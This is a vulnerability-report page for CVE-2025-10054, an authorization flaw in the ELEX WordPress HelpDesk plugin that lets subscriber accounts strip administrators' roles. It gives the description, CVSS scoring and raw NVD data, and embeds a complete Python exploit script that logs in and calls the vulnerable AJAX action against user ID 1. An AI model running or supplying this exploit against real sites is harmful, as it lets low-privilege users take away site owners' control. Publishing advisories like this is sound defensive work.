Security Vulnerability Report
中文
CVE-2025-10054 CVSS 4.3 MEDIUM

CVE-2025-10054

Published: 2025-11-21 13:15:46
Last Modified: 2026-04-08 17:19:55
Source: [email protected]

Description

The ELEX WordPress HelpDesk & Customer Ticketing System plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'eh_crm_remove_agent' function in all versions up to, and including, 3.3.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to remove the role and capabilities of any user with an Administrator, WSDesk Supervisor, or WSDesk Agents role.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:elula:wsdesk:*:*:*:*:free:wordpress:*:* - VULNERABLE
ELEX WordPress HelpDesk & Customer Ticketing System <= 3.3.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-10054 PoC - ELEX WordPress HelpDesk IDOR/Privilege Escalation # Target: WordPress site with ELEX HelpDesk plugin <= 3.3.1 target_url = "http://target-wordpress-site.com" # Authentication - Any subscriber+ account works username = "attacker_account" password = "attacker_password" # Target user ID to strip roles from (typically 1 for admin) target_user_id = 1 def exploit_cve_2025_10054(): """ Exploit for CVE-2025-10054: Missing authorization check in eh_crm_remove_agent This PoC demonstrates how an authenticated low-privilege user can remove roles/capabilities from any user including administrators. """ session = requests.Session() # Step 1: Authenticate with low-privilege account login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/' } login_response = session.post(login_url, data=login_data) if 'wordpress_logged_in' not in session.cookies.get_dict(): print("[-] Authentication failed") return False print("[+] Successfully authenticated as low-privilege user") # Step 2: Exploit the vulnerability ajax_url = f"{target_url}/wp-admin/admin-ajax.php" exploit_data = { 'action': 'eh_crm_remove_agent', 'remove_agent_user_id': target_user_id } exploit_response = session.post(ajax_url, data=exploit_data) if exploit_response.status_code == 200: print(f"[+] Exploit sent successfully for target user ID: {target_user_id}") print(f"[+] Response: {exploit_response.text}") print("[*] Target user roles/capabilities have been stripped") return True else: print(f"[-] Exploit failed with status: {exploit_response.status_code}") return False if __name__ == "__main__": print("=" * 60) print("CVE-2025-10054 PoC - ELEX WordPress HelpDesk Plugin") print("Vulnerability: Missing authorization in eh_crm_remove_agent") print("=" * 60) exploit_cve_2025_10054()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10054", "sourceIdentifier": "[email protected]", "published": "2025-11-21T13:15:45.657", "lastModified": "2026-04-08T17:19:55.210", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "The ELEX WordPress HelpDesk & Customer Ticketing System plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'eh_crm_remove_agent' function in all versions up to, and including, 3.3.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to remove the role and capabilities of any user with an Administrator, WSDesk Supervisor, or WSDesk Agents role."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:elula:wsdesk:*:*:*:*:free:wordpress:*:*", "versionEndExcluding": "3.3.2", "matchCriteriaId": "6D3C90F8-FBE9-409A-A29E-3D775928E2BF"}]}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/elex-helpdesk-customer-support-ticket-system/trunk/includes/class-crm-ajax-functions-two.php#L77", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://plugins.trac.wordpress.org/changeset/3399391/", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/07c92f79-94ac-4153-9ab2-9608601508b0?source=cve", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.